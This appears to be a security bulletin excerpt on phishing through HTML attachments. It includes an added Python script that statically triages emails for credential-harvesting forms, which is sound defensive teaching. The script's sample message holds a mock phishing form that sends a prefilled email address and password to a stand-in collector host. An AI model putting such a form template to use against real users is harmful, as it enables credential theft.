Phishing campaigns often use the same formula: an email that contains a link or an attachment is sent to the recipient with the purpose of retrieving data, either by directing the user to a fake web page on the internet or by executing malicious code from the attachment. This text presents the HTML attachment tactic that is used for phishing, along with a few methods used to discover and prevent scam emails. The tactic itself isn’t new, but the case studied in this text is a recent one. In this phishing tactic, an HTML attachment is sent to the target. If the target opens the attachment, its malicious code executes and a phishing website runs locally in the target’s web browser.
Analyzing and understanding how different kinds of malicious links and malware work is interesting and useful for defensive purposes, but it is important to analyze them in a safe and isolated environment. Centria SecuLab has a malware lab environment where malicious programs and links can be tested safely. Our Cyber Security Specialist Olli Isohanni wrote an article about how to investigate a phishing mail.
The article is about an email that was targeted at a specific individual as a notice of a payment that was made recently. The only way to check this so-called “payment” was to download the included attachment named “Remittance-copy” and open it. This attachment opened a somewhat authentic-looking Microsoft login page that had the target’s email address already filled…
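The attachment described above can be triaged without ever opening it in a browser. The following is an added example, not code from the article or from Centria SecuLab: it statically parses a message, finds HTML attachments, and flags those that contain a password field together with a form posting to a remote host or the recipient's address prefilled. The names `triage` and `FormScan`, the sample addresses, and the collector host are all constructed for illustration.

```python
from email import message_from_bytes, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message for illustration; not the mail from the article.
SAMPLE_EML = b"""\
From: billing@example.test
To: target@example.org
Subject: Payment notice
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="Remittance-copy.html"

<form action="https://collector.example.net/post.php" method="post">
<input type="email" name="user" value="target@example.org">
<input type="password" name="pass"><input type="submit" value="Sign in"></form>
--b1--
"""

class FormScan(HTMLParser):
    """Collects form targets, password fields and prefilled values; renders nothing."""
    def __init__(self):
        super().__init__()
        self.remote_actions, self.has_password, self.values = [], False, []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and urlparse(a.get("action", "")).scheme in ("http", "https"):
            self.remote_actions.append(a["action"])
        elif tag == "input":
            self.has_password |= a.get("type", "").lower() == "password"
            self.values.append(a.get("value", "").strip().lower())

def triage(raw_eml):
    """Statically inspect each HTML attachment; nothing is opened in a browser."""
    msg = message_from_bytes(raw_eml, policy=policy.default)
    recipient = msg["To"].addresses[0].addr_spec.lower() if msg["To"] else ""
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        scan = FormScan()
        scan.feed((part.get_payload(decode=True) or b"").decode("utf-8", "replace"))
        prefilled = bool(recipient) and recipient in scan.values
        findings.append({"file": name, "remote_actions": scan.remote_actions,
                         "password_field": scan.has_password, "recipient_prefilled": prefilled,
                         "suspicious": scan.has_password and (bool(scan.remote_actions) or prefilled)})
    return findings
```

An attachment that builds its login form with script at load time will show no static form, so a clean result here does not clear the file; it still belongs in the isolated lab.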
Read the full story about how to handle a phishing mail. centriabulletin.fi/phishing